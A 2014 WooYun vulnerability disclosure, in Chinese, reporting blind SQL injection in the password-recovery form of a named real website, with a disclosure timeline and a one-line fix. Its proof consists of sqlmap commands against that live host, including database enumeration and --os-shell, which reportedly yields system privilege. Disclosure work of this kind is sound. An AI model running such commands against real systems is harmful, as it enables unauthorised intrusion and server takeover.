漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-09-25: 细节已通知厂商并且等待厂商处理中
2014-09-28: 厂商已经确认,细节仅向厂商公开
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-09: 细节向公众公开
简要描述:
前台虐我千百遍 我待前台如初恋
详细说明:
站点:http://gjdx.sd.vnet.cn
找回密码功能post注入
http://gjdx.sd.vnet.cn/findPassword.html
burp抓包
http://gjdx.sd.vnet.cn/findPassword.do
post:hotline= (存在注入且是盲注)
sqlmap -u "http://gjdx.sd.vnet.cn/findPassword.do" --data "hotline=123123"
漏洞证明:
sqlmap -u "http://gjdx.sd.vnet.cn/findPassword.do" --data "hotline=123123" --dbs
sqlmap -u "http://gjdx.sd.vnet.cn/findPassword.do" --data "hotline=123123" --current-user
sqlmap -u "http://gjdx.sd.vnet.cn/findPassword.do" --data "hotline=123123" --os-shell
system权限
修复方案:
参数过滤
版权声明:转载请注明来源 玉林嘎@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-09-28 11:54
厂商回复:
最新状态:
暂无